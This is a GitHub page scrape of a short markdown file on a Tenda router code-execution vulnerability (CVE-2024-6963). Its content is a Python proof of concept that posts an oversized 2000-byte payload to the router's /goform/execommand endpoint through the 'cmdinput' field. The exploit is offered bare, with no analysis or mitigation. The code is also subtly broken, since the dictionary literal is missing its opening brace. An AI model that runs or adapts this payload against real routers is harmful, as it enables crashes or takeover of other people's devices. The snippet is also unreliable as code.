Skip to content

Latest commit

 

History

History
11 lines (8 loc) · 178 Bytes

Tenda 03 代码执行漏洞(CVE-2024-6963).md

File metadata and controls

11 lines (8 loc) · 178 Bytes

import requests
ip ="192.168.84.101"
url="http://"+ ip +"/goform/execommand"
payload = b"a"*2000

data = f"cmdinput": payload}
response = requests.post(url, data=data)